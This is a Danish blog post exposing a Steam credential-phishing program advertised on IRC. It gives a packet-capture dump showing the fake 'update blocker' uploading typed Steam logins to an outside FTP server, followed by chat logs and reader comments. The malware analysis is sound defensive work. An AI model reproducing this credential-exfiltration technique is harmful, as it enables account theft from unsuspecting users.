Her sen eftermiddag sad jeg og stenede lagde jeg mærke til denne besked på #needclan.dk
17:25:02 < hiiox> Are you tired of all those lame steam updates? I made a steam application which stops these updates and remains your current steam.exe. See http://martinph._EXCLUDED_/steam.exe – NB: Your anti virus COULD give a false positive on this
Det er jo tydeligt at det har noget med phishing, men det bliver værre
17:28:31 < MartinH> Nogle der er villige til at teste en steam client der bypasser opdateringer ? skriv til mig
– random chat stripped –
17:30:06 < MartinH> Jeg har udviklet det
Okay, fjolset har allerede der indrømmet hans phishing nummer, men det bliver værre da han svar på følgende:
17:30:17 -!- MartinH is now known as [ADK]mart1N
17:31:45 < zephid> [ADK]mart1N: Hvad har du udvilket det i?
17:32:02 < [ADK]mart1N> Har skrevet det i delphi
Okay, det er skrevet i Delphi, hmm, Delphi er så smart at man har ingen kontrol over de exe filer den spytter ud, de er nemlig typisk static, dvs. der er ingen mulighed for at skjule hensigten med programmet, lang historie kort, du kan læse hans “hack” med Wordpad.
Men jeg testede hans “hack” i en VMware box med XP, og ja, det var rimeligt simplet at bevise “hacket”.
Testen + Resultatet
Jeg installerede en Packet Sniffer, lod den kører i baggrunden, prøvede at “logge ind” på steam med “testkey@zephid.dk” / “1234567890”, og gik tilbage til Packet Snifferen, jeg har fjernet alt hex kode mm, og blot lavet et dump af selve forbindelsen som hans “hack” laver:
..220 FTP server ready.
USER elfiee
331 User elfiee OK. Password required
PASS _EXCLUDED_
230-Your bandwidth usage is restricted
230-User elfiee has group access to:Â fh
230-OK. Current restricted directory is /
230-1 files used (0%) – authorized: 5000 files
230 0 Kbytes used (0%) – authorized: 20480 Kb
MKD SteamLogFiles
550-Can’t create directory: File exists
550-1 files used (0%) – authorized: 5000 files
550 0 Kbytes used (0%) – authorized: 20480 Kb
CWD SteamLogFiles
250 OK. Current directory is /SteamLogFiles
TYPE I
200 TYPE is now 8-bit binary
PASV
227 Entering Passive Mode (205,134,160,58,202,217)
STOR LogFrom_Mads.txt
150 Accepted data connection
226-19065.5 Mbytes free disk space
226-2 files used (0%) – authorized: 5000 files
226-0 Kbytes used (0%) – authorized: 20480 Kb
226-File successfully transferred
226 0.180 seconds (measured here), 0.71 Kbytes per second
For dem som ikke forstår hvad der sker, så sender hans “hack” en fil ved navn “LogFrom_Mads.txt” til en ftp server hos 100free.com, indholdet af “LogFrom_Mads.txt”:
******* SPS [Beta] By Gakh *******
Username: testkey@zephid.dk
Password: 1234567890**********************************
En efterfølgende Query
Da jeg havde afsløret ham i hans Phising nummer, smuttede han fra #needclan.dk og startede en Query med mig, indholdet af Querien kan ses herunder.
17:45:50 <[ADK]mart1N> btw, det er ikke ulovligt
17:46:41 <zephid> Jo, er det faktisk
17:46:45 <[ADK]mart1N> Nej
17:46:55 <zephid> Det er svindel
17:46:59 <[ADK]mart1N> Det er 100% op til dig selv at passe pa hvad du henter pa nettet
17:47:02 <[ADK]mart1N> Overhovedet ikke
17:47:16 <[ADK]mart1N> men skulle egentlig ogsa bare se om det virkede 🙂
17:47:40 <zephid> Prøv du at tage det op med det Danske retvæsen, det her er Danmark, og ikke USA, og hver du glad for det egenlig
17:48:03 <[ADK]mart1N> Arh, sa langt kommer det aldrig kære ven 🙂
17:48:19 <[ADK]mart1N> Som sagt er jeg bare en lille testkanin
17:49:05 <[ADK]mart1N> Desuden bor jeg ikke i Danmark
17:49:38 <zephid> Næsten lige meget, hvis du er inden for EU’s grænser, så kan du dømmes efter EU domstolen 🙂
17:49:50 <[ADK]mart1N> Jae, kan jeg sikkert
17:49:55 <[ADK]mart1N> Men det var nu ikke ondsindet af mig
17:50:45 -!- [ADK]mart1N [martinh@MartinH.users.quakenet.org]
17:50:45 -!- ircname : sBNC by #CUPTOUR
17:50:45 -!-Â channels : #3on3 #pcw #k1ck #mousesports +#esl #5on5 #5on5.css @#adk-gaming #CUPTOUR
17:50:45 -!- server  : *.quakenet.org [QuakeNet IRC Server]
17:50:45 -!- account : MartinH
17:50:45 -!- idle    : 0 days 0 hours 0 mins 50 secs [signon: Sat Aug 2 17:14:42 2008]
17:50:45 -!- End of WHOIS
17:50:48 <[ADK]mart1N> Men ma hellere fjerne det 😉
Jeg ved ikke hvor gammel knægten er, men særlig gammel kan han sgu ikke være …
Jeg prøvede faktisk at joine #adk-gaming, men det er en invite only kanal, desværre 🙁
Anyway, det var hyggeligt MartinH 🙂
Update: MartinH er forduftet fra Quakenet, er lige pt. i dialog med #CUPTOUR for at se om vi kan få ham sportet.
Du er så sød mads 🙂
Elsker dine logs 🙂
Haha genialt 😀
<3 mads
Du laver de bedste blogs mate, owned så meget af Zephid 0.o
Downloadede den 3 gange, hvorfor virker den ikke ^^ :p
Godt at høre du fik den kiddie der 🙂
Men men ville nu hellere høre mere om da du besvimede da du gik ind i din egen dør 🙂